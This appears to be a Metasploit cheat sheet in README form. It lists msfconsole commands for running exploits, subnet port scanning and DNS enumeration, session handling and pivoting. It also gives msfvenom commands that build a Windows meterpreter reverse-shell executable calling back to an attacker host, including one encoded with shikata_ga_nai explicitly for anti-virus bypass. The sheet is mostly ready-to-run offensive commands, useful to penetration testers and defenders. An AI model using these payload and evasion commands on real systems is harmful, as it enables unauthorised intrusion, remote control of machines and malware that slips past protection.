Metasploit-Cheat-Sheet

Metasploit Cheat Sheet

License: MIT


Metasploit Project is a computer security project which provide information about vulnerabilities. Help in the development of penetration tests and IDS signatures, metasploit is very popular tool used by pentest experts.

Metasploit :

msf > search [regex]
msf > use exploit/[ExploitPath]
msf > set PAYLOAD [PayloadPath]
msf > show options
msf > set [Option] [Value]
msf > exploit 

Useful Auxiliary Modules

msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 192.168.10.0/24
msf > run
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
msf > use auxiliary/server/socks4
msf > run 

msfvenom :

msfvenom this is tool can be used to generate Metasploit payloads as standalone files and optionally encode them. This tool replaces msfpayload and msfencode tools. Run with ‘’-l payloads’ to get a list of payloads.

$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=192.168.1.1
LPORT=4444 > met.exe

msfvenom can be used to apply a level of encoding for anti-virus bypass. For example run msfvenom with -l encoders to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=192.168.1.1 LPORT=4444 > mal.exe

Metasploit Meterpreter


Managing Sessions

Multiple Exploitation:
msf > exploit -z
msf > exploit –j
msf > jobs –l
msf > jobs –k [JobID]
Multiple Sessions:
msf > sessions -l
msf > session -i [SessionID]
meterpreter > <Ctrl+Z>

or

meterpreter > background

All modules against the target subnet mask will be pivoted through this session.

msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]